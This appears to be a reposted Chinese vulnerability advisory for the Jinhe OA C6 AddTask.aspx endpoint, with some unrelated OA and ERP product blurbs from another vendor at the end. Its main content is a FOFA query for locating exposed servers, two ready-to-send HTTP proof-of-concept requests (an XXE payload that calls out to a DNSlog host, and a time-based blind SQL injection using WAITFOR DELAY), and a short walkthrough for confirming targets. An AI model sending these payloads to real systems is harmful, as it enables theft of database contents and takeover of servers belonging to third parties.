漏洞说明：

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和OA C6 AddTask.aspx 接口处存在SQL注入漏洞，同时该接口还存在XXE漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

漏洞类型：

命令执行和数据注入

漏洞特征：

FOFA:app="金和网络-金和OA" || body="/c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx"

POC:

xxe命令执行poc,需要dnslog外带回显

POST /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx/ HTTP/1.1Content-Type: application/xmlHost: xxx.comContent-Length: 134<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://DNSURL">%remote;]><root/>

时间盲注poc,需要查看时间

POST /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx/ HTTP/1.1Content-Type: application/xmlHost: xxx.comContent-Length: 229<root>  <Page>    <PageName>TaskDetect</PageName>  </Page>  <StartTime>2023-01-01 00:00:00</StartTime>  <EndTime>2023-01-01 00:00:00</EndTime>  <TaskExecutorID>3');WAITFOR DELAY'0:0:5'-- </TaskExecutorID></root>

渗透过程：

通过漏洞特征在FOFA找到目标

通过xxepoc，查询到dnslog有记录

通过时间盲注poc,观察到结果返回时间>5000

阅读原文：原文链接

该文章在 2025/7/18 10:40:58 编辑过

关键字查询

正在查询...

点晴ERP是一款针对中小制造业的专业生产管理软件系统,系统成熟度和易用性得到了国内大量中小企业的青睐。

点晴PMS码头管理系统主要针对港口码头集装箱与散货日常运作、调度、堆场、车队、财务费用、相关报表等业务管理，结合码头的业务特点，围绕调度、堆场作业而开发的。集技术的先进性、管理的有效性于一体，是物流码头及其他港口类企业的高效ERP管理信息系统。

点晴WMS仓储管理系统提供了货物产品管理,销售管理,采购管理,仓储管理,仓库管理,保质期管理,货位管理,库位管理,生产管理,WMS管理系统,标签打印,条形码,二维码管理,批号管理软件。

点晴免费OA是一款软件和通用服务都免费，不限功能、不限时间、不限用户的免费OA协同办公管理系统。